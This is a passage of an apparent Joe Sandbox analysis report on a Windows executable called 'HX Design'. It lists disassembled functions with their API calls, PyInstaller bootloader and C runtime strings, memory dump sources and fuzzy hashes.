                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF732074F11,?,?,?,?,00007FF73207A48A,?,?,?,?,00007FF73207718F), ref: 00007FF73207B34B
                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF732074F11,?,?,?,?,00007FF73207A48A,?,?,?,?,00007FF73207718F), ref: 00007FF73207B35C
                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(?,?,?,00007FF732074F11,?,?,?,?,00007FF73207A48A,?,?,?,?,00007FF73207718F), ref: 00007FF73207B377
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2506987500-0
                                                                                                                                                                                                                                                      • Opcode ID: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                                                      • Instruction ID: 4e2f5dd7773db595235df4696eed858f3ba725a20cb7e844db9264bc19a4165d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA11A230B0C642A2FA587329568513DD2429F447B0FD44735D83E877D6DEACB489E720
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF732061B6A), ref: 00007FF73206295E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                      • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                      • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                                      • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                                      • Instruction ID: 512a3ce63ac4637b42a212e25544e0c80f7409538e8813506ed7afeb1f60d510
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88312622B1868166E720B765A8402F7E294FF887D4F800132FE8D83755EFBCD54AD620
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                                      • String ID: Unhandled exception in script
                                                                                                                                                                                                                                                      • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                                      • Opcode ID: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                                                      • Instruction ID: 777644cc3ed31458f20c14535f226a9951ffdaa53cc1dcfabbf4cfbc9e3791a4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5031837271968199EB20FF21E8552FAA360FF88788F840135EA4D87B5ADF7CD108D710
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF73206918F,?,00007FF732063C55), ref: 00007FF732062BA0
                                                                                                                                                                                                                                                      • MessageBoxW.USER32 ref: 00007FF732062C2A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                                      • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                                      • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                                      • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                                      • Instruction ID: 6c2ff5dee5daf53e4cd41c89d6dcd444d7a53b8cddbd14a373a39e3ef6f3afaf
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0721F432708B41A2E710AB14F8447EAB3A4FB88780F804136EE8D93756EF7CD649C750
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF732061B99), ref: 00007FF732062760
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                      • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                      • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                                      • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                                      • Instruction ID: 6f0ddf64b30ce57bc7c4a3b5286dd292a5ff2cf1553aa8f40079a70b5259f87b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC21A132B19781A2E720AB54F8407EAA394FB88784F800132FE8C83759EFBCD149D750
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                      • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                                      • Instruction ID: 4c8ac577bc84f2e3598a64fa95ceeedc12c0a91acfa27cf058b7d1a88a5209b2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29F0C221B0A706A1EE10AB24E48537AA320EF45760FD40235C67E862F4CFACD04CE360
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _set_statfp
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1156100317-0
                                                                                                                                                                                                                                                      • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                      • Instruction ID: 4857583898f123c196153820948167680cf688ed728d379dc45ad4bd8587d776
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4118222E5CA0B22FA653165E4D137B9050EF59370F840634EBEE173D68EEC6849E120
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF73207A5A3,?,?,00000000,00007FF73207A83E,?,?,?,?,?,00007FF73207A7CA), ref: 00007FF73207B3AF
                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF73207A5A3,?,?,00000000,00007FF73207A83E,?,?,?,?,?,00007FF73207A7CA), ref: 00007FF73207B3CE
                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF73207A5A3,?,?,00000000,00007FF73207A83E,?,?,?,?,?,00007FF73207A7CA), ref: 00007FF73207B3F6
                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF73207A5A3,?,?,00000000,00007FF73207A83E,?,?,?,?,?,00007FF73207A7CA), ref: 00007FF73207B407
                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF73207A5A3,?,?,00000000,00007FF73207A83E,?,?,?,?,?,00007FF73207A7CA), ref: 00007FF73207B418
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                                                                                                      • Opcode ID: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                                                      • Instruction ID: d91933723b99941e9c2a813186865576ca2d83b7731c0a95a87b2dcec63515c8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 10117F30E0C642A2FA58B3299941179E1815F547B0FD84334E93E567D6DEACA85AE720
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                                                                                                      • Opcode ID: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                                                      • Instruction ID: 9a2b1dbf7c303c19e24e2778d57d8ccbda81e9d6edeae1bf8e1bec8b0bc80eeb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7113920E0E207A1FAA8727D481557E92824F65330FD84734D93E4A7D2DDACB85AF7B1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID: verbose
                                                                                                                                                                                                                                                      • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                      • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                      • Instruction ID: 3270c31eed4857952a290424676e7a39f7fd3d33aded40a8c2093a8f6b47a28d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B91E332A08A46A5F761BE28D45437EB7A1AB40B54FC84132DA5F433D6DFBCE409E360
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                      • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                      • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                                      • Instruction ID: 94d5728b028eeeb74cbb77884a9a00c7886a046a4c8429e576379bb99012ac0d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB81C272D08243A5F764BF2D8118278A6A2EB11B84FD58031CA2D97295CFECFC49F721
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                                                      • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                      • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                                      • Instruction ID: d3077df64576c4ac8c499069be1209d2df6c603a8054bbb2a18b5d5ce8768f7e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9451E432B19642AADB14EF15E044A78B391FB44F88F908130DE6E57788EFBDE845D714
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                                                                                                      • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                      • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                                      • Instruction ID: 3ff0ec4118221d5c5f5fa347dd57f2d483cbbc59d068c7651b482b107c95a8bd
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C351B3327083429AEB34AB21D088269B7A0FB55B84F985136DA5E47F85CFBCE458D718
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                      • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                                      • Instruction ID: 4d90f1188ff7a7f9464b9f797c1b8cba77273c5fc9dd3856ad185efe238e326c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B61A432A08BC595E730AF15E4407AAF7A0FB94784F444225EB9D07B5ADFBCD194CB14
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
